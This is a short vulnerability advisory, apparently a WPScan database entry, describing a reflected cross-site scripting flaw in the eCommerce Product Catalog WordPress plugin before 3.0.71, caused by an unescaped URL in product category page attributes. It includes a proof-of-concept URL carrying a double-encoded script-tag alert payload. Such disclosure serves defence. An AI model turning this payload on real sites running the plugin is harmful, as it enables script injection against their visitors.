WordPress Plugin Vulnerabilities
eCommerce Product Catalog Plugin for WordPress < 3.0.71 - Reflected XSS
Description
The plugin does not sanitise and escape an URL before outputting it back in an attribute of product category pages, leading to a Reflected Cross-Site Scripting
Proof of Concept
https://example.com/products-category/cat/?product_category=1&a%2522%253e%253cscript%253ealert%2528/XSS/%2529%253c%252fscript%253e=1
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
CraCkEr
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-10-10 (about 1 years ago)
Added
2022-10-11 (about 1 years ago)
Last Updated
2022-10-11 (about 1 years ago)